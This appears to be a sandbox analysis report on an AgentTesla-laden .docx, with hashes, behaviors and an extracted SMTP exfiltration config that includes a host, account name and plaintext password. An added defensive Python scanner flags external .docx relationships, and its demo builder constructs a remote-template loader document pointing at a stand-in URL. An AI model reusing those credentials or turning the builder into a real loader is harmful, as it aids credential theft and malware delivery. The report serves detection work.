General
Target: aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f
Size: 16KB
Sample: 231207-b5n8csgfbj
MD5: b5b884c10723261ef25cc10db807eb8b
SHA1: 5f89a7039838e52bb5e440d7b51b2635802dcc02
SHA256: aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f
SHA512: 20ef9f8553e7cb2af0497c22b82084519dd7ad1ffb13100efc7900797aaa190ba1b3abb3e9a0ec6bad3eb8bd71bdb061f8d4c107565746948260e0967a4c9c7f
SSDEEP: 384:uyXrVqFWus8PL8wi4OEwH8TIbE91r2fRGJYJvimP49eb:ucrOJ5P3DOqnYJQEvTP49G
Static task: static1
Behavioral task: behavioral1
  Sample: aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f.docx
  Resource: win7-20231130-en
Behavioral task: behavioral2
  Sample: aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f.docx
  Resource: win10v2004-20231127-en
Malware Config
Extracted: agenttesla
Protocol: smtp
Host: mail.turathmall-ksa.com
Port: 587
Username: [email protected]
Password: Julliannah123
Email To: [email protected]
Targets
Target: aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f
Size: 16KB
MD5: b5b884c10723261ef25cc10db807eb8b
SHA1: 5f89a7039838e52bb5e440d7b51b2635802dcc02
SHA256: aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f
SHA512: 20ef9f8553e7cb2af0497c22b82084519dd7ad1ffb13100efc7900797aaa190ba1b3abb3e9a0ec6bad3eb8bd71bdb061f8d4c107565746948260e0967a4c9c7f
SSDEEP: 384:uyXrVqFWus8PL8wi4OEwH8TIbE91r2fRGJYJvimP49eb:ucrOJ5P3DOqnYJQEvTP49G
AgentTesla
Agent Tesla is a .NET-based (Visual Basic .NET / C#) remote access tool (RAT) and credential stealer; the configuration extracted above shows this build exfiltrating over SMTP to the listed mail host and port.
- Blocklisted process makes network request
- Downloads MZ/PE file
- Abuses OpenXML format to download file from external location
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
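The "Abuses OpenXML format to download file from external location" verdict means a relationship inside the .docx package points at a URL instead of a part in the archive; Word fetches some of these (notably a remote attachedTemplate in word/_rels/settings.xml.rels) automatically on open, which is how a 16KB document ends up pulling a PE from the internet. The following added example, which is not the sandbox's own detection logic, unzips a .docx in memory and reports every TargetMode="External" relationship, separating types Word resolves automatically from click-driven hyperlinks. The sample document it builds and the URL in it are constructed for the demo and are not indicators from this report.

```python
"""Find external relationships in an Office Open XML (.docx) package.

Added example; not the sandbox's detection code. The document produced by
build_sample_docx() and its template URL are constructed for this demo.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# External targets of these types are only followed on user click; anything
# else with TargetMode="External" (attachedTemplate, oleObject, frame, ...)
# may be fetched by Word without interaction and is the interesting case.
CLICK_ONLY_TYPES = {OFFICE_REL + "hyperlink"}


def find_external_relationships(docx_bytes: bytes) -> list[dict]:
    """Return one finding per TargetMode="External" relationship in any .rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                rtype = rel.get("Type", "")
                findings.append({
                    "part": name,
                    "type": rtype.rsplit("/", 1)[-1],   # e.g. attachedTemplate
                    "target": rel.get("Target", ""),
                    "auto_fetch": rtype not in CLICK_ONLY_TYPES,
                })
    return findings


def is_remote_loader(docx_bytes: bytes) -> bool:
    """True when any external relationship is one Word resolves on open."""
    return any(f["auto_fetch"] for f in find_external_relationships(docx_bytes))


def build_sample_docx(template_url: str) -> bytes:
    """Construct a minimal .docx with a remote attachedTemplate plus a benign
    hyperlink, so the scanner has both cases to distinguish. Demo data only."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">{{body}}</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels", rels.format(
            body=f'<Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" Target="word/document.xml"/>'))
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml", "<w:settings/>")
        z.writestr("word/_rels/document.xml.rels", rels.format(
            body=f'<Relationship Id="rId1" Type="{OFFICE_REL}settings" Target="settings.xml"/>'
                 f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" '
                 'Target="https://example.invalid/" TargetMode="External"/>'))
        # The remote-template trick: Word fetches this target when the document opens.
        z.writestr("word/_rels/settings.xml.rels", rels.format(
            body=f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
                 f'Target="{template_url}" TargetMode="External"/>'))
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://example.invalid/template.dotm")  # constructed URL
    for f in find_external_relationships(sample):
        print(f"{'AUTO ' if f['auto_fetch'] else 'click'} {f['part']}: {f['type']} -> {f['target']}")
    print("remote loader:", is_remote_loader(sample))
```

To triage a real document, read the file's bytes and pass them to find_external_relationships(); the part name and relationship type tell you where the fetch is wired in, and the target URL is the network indicator to block and to hunt for in proxy logs.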